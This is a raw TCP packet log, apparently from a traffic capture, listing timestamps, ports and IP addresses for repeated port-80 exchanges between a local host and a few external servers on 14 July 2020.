                                                                                                                                      Jul 14, 2020 11:21:21.427933931 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:21.947421074 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:22.038686037 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:22.038908958 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:22.383347988 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:22.474579096 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:22.474839926 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:22.849162102 CEST4971580192.168.1.1028.208.80.226
                                                                                                                                      Jul 14, 2020 11:21:23.013705015 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:23.105078936 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:23.106017113 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:23.421612024 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:23.515053034 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:23.515281916 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:23.847744942 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:23.941159010 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:23.941553116 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:24.291476011 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:24.382613897 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:24.382931948 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:24.686016083 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:24.774272919 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:24.774533033 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:25.090848923 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:25.178890944 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:25.179223061 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:25.473553896 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:25.564625025 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:25.565037966 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:25.890580893 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:25.979252100 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:25.979474068 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:26.269500971 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:26.358181000 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:26.358335972 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:26.666646004 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:26.754947901 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:26.755101919 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:27.062346935 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:27.157646894 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:27.157917976 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:27.488862038 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:27.577548027 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:27.577675104 CEST4970680192.168.1.10291.218.231.226
Timestamp                             Source Port  Dest Port  Source IP        Dest IP
Jul 14, 2020 11:21:27.893368006 CEST  49706        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:27.983858109 CEST  80           49706      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:27.984160900 CEST  49706        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:28.332865953 CEST  49706        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:28.423402071 CEST  80           49706      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:28.423733950 CEST  49706        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:29.189496994 CEST  49706        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:29.278027058 CEST  80           49706      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:29.278378010 CEST  49706        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:29.720341921 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:21:29.720519066 CEST  49704        80         192.168.1.102    5.101.51.247
Jul 14, 2020 11:21:29.990784883 CEST  49706        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:30.078178883 CEST  80           49706      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:30.078478098 CEST  49706        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:30.420001984 CEST  49706        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:30.511107922 CEST  80           49706      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:30.511432886 CEST  49706        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:30.873801947 CEST  49706        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:30.966468096 CEST  80           49706      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:30.967063904 CEST  49706        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:31.279530048 CEST  49706        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:31.368153095 CEST  80           49706      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:31.368546963 CEST  49706        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:31.696048021 CEST  49706        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:31.784147024 CEST  80           49706      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:31.784471035 CEST  49706        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:32.233062029 CEST  49706        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:32.324143887 CEST  80           49706      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:32.324492931 CEST  49706        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:33.262674093 CEST  49706        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:33.351138115 CEST  80           49706      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:33.351418972 CEST  49706        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:33.781209946 CEST  80           49705      54.225.191.113   192.168.1.102
Jul 14, 2020 11:21:33.781440020 CEST  49705        80         192.168.1.102    54.225.191.113
Jul 14, 2020 11:21:34.116233110 CEST  49706        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:34.205272913 CEST  80           49706      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:34.205481052 CEST  49706        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:34.797559023 CEST  49706        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:34.885416031 CEST  80           49706      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:34.885651112 CEST  49706        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:35.510005951 CEST  49706        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:35.601284981 CEST  80           49706      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:35.601619959 CEST  49706        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:35.949476004 CEST  49706        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:36.043642998 CEST  80           49706      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:36.043972015 CEST  49706        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:36.396820068 CEST  49706        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:36.487154007 CEST  80           49706      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:36.487392902 CEST  49706        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:36.786541939 CEST  49706        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:36.879302025 CEST  80           49706      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:36.879333019 CEST  80           49706      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:36.879621983 CEST  49706        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:36.880151033 CEST  49706        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:36.940241098 CEST  80           49706      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:37.183384895 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:37.243273020 CEST  80           49716      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:37.243550062 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:37.244510889 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:37.304230928 CEST  80           49716      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:37.458062887 CEST  80           49716      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:37.458444118 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:37.790751934 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:37.850519896 CEST  80           49716      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:37.878901005 CEST  80           49716      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:37.879173040 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:38.188277006 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:38.284400940 CEST  80           49716      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:38.284557104 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:38.630260944 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:38.720710039 CEST  80           49716      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:38.720923901 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:39.026985884 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:39.121481895 CEST  80           49716      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:39.121742010 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:39.430454969 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:39.522489071 CEST  80           49716      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:39.522857904 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:39.831737995 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:39.929546118 CEST  80           49716      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:39.929775000 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:40.242073059 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:40.340636969 CEST  80           49716      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:40.340974092 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:40.675076008 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:40.773619890 CEST  80           49716      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:40.773832083 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:41.088870049 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:41.181619883 CEST  80           49716      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:41.181794882 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:41.521646976 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:41.616925001 CEST  80           49716      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:41.617115974 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:41.933448076 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:42.025422096 CEST  80           49716      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:42.025578022 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:42.333851099 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:42.432853937 CEST  80           49716      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:42.443490028 CEST  80           49716      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:42.443767071 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:42.742784977 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:42.802659035 CEST  80           49716      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:42.830826044 CEST  80           49716      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:42.831279993 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:43.144378901 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:43.232639074 CEST  80           49716      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:43.233032942 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:43.539115906 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:43.629667044 CEST  80           49716      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:43.629856110 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:43.952353954 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:44.042032957 CEST  80           49716      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:44.042439938 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:44.414557934 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:44.503479004 CEST  80           49716      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:44.503648996 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:44.808948994 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:44.900147915 CEST  80           49716      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:44.900301933 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:45.204744101 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:45.298270941 CEST  80           49716      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:45.298429012 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:45.611336946 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:45.706754923 CEST  80           49716      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:45.706953049 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:46.025877953 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:46.118980885 CEST  80           49716      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:46.119385958 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:46.437747955 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:46.533116102 CEST  80           49716      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:46.533238888 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:46.842355967 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:46.936834097 CEST  80           49716      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:46.937115908 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:47.263849974 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:47.359527111 CEST  80           49716      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:47.359844923 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:47.680401087 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:47.771220922 CEST  80           49716      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:47.771445990 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:48.258481026 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:48.349756002 CEST  80           49716      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:48.349997044 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:48.639834881 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:48.733324051 CEST  80           49716      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:48.733510017 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:49.039860964 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:49.130265951 CEST  80           49716      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:49.130498886 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:49.479088068 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:49.576457977 CEST  80           49716      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:49.576740980 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:49.892574072 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:49.981486082 CEST  80           49716      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:49.981654882 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:50.273179054 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:50.366945982 CEST  80           49716      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:50.367243052 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:50.808279037 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:50.903605938 CEST  80           49716      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:50.903898001 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:51.489044905 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:51.583834887 CEST  80           49716      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:51.584084988 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:52.254606962 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:52.344182014 CEST  80           49716      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:52.344758034 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:53.264769077 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:53.357738972 CEST  80           49716      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:53.360348940 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:53.678448915 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:53.770147085 CEST  80           49716      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:53.770458937 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:54.752809048 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:54.842693090 CEST  80           49716      91.218.231.226   192.168.1.102
Jul 14, 2020 11:21:54.843226910 CEST  49716        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:21:55.162519932 CEST  49716        80         192.168.1.102    91.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:55.256217003 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:55.256553888 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:55.581312895 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:55.676470041 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:55.676764011 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:55.985083103 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:56.082051992 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:56.082278013 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:56.372133017 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:56.467552900 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:56.467758894 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:57.074621916 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:57.168193102 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:57.168612957 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:57.509881020 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:57.606030941 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:57.606201887 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:57.901901960 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:57.990927935 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:57.991358995 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:58.300019026 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:58.390605927 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:58.390824080 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:58.708343983 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:58.807141066 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:58.807387114 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:59.119708061 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:59.218919992 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:59.218976021 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:59.219115019 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:59.530056000 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:59.589809895 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:59.628071070 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:59.628241062 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:59.978267908 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:00.077929974 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:00.080739021 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:00.080941916 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:00.397629976 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:00.457387924 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:00.492716074 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:00.493048906 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:00.794836998 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:00.890624046 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:00.890818119 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:01.258352995 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:01.353295088 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:01.353538990 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:01.668510914 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:01.756225109 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:01.756463051 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:02.080809116 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:02.171083927 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:02.171406031 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:02.499869108 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:02.590312004 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:02.590481043 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:02.976793051 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:03.065212011 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:03.065408945 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:03.338344097 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:22:03.403173923 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:03.540097952 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:03.632066965 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:03.632304907 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:03.952004910 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:04.040241957 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:04.040436983 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:04.555804968 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:04.646260977 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:04.646482944 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:04.999409914 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:05.090301991 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:05.090521097 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:05.410897970 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:05.509933949 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:05.513786077 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:05.514048100 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:05.845410109 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:05.905339003 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:05.934211969 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:05.934478045 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:06.318648100 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:06.332153082 CEST4971780192.168.1.1028.208.80.226
                                                                                                                                      Jul 14, 2020 11:22:06.332465887 CEST4971880192.168.1.1028.208.80.226
                                                                                                                                      Jul 14, 2020 11:22:06.368376017 CEST80497178.208.80.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:06.368575096 CEST4971780192.168.1.1028.208.80.226
                                                                                                                                      Jul 14, 2020 11:22:06.368726015 CEST80497188.208.80.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:06.368849039 CEST4971880192.168.1.1028.208.80.226
                                                                                                                                      Jul 14, 2020 11:22:06.369544029 CEST4971780192.168.1.1028.208.80.226
                                                                                                                                      Jul 14, 2020 11:22:06.409316063 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:06.409533024 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:06.446243048 CEST80497178.208.80.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:06.625502110 CEST80497178.208.80.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:06.625751019 CEST4971780192.168.1.1028.208.80.226
                                                                                                                                      Jul 14, 2020 11:22:06.628006935 CEST4971780192.168.1.1028.208.80.226
                                                                                                                                      Jul 14, 2020 11:22:06.664191961 CEST80497178.208.80.226192.168.1.102
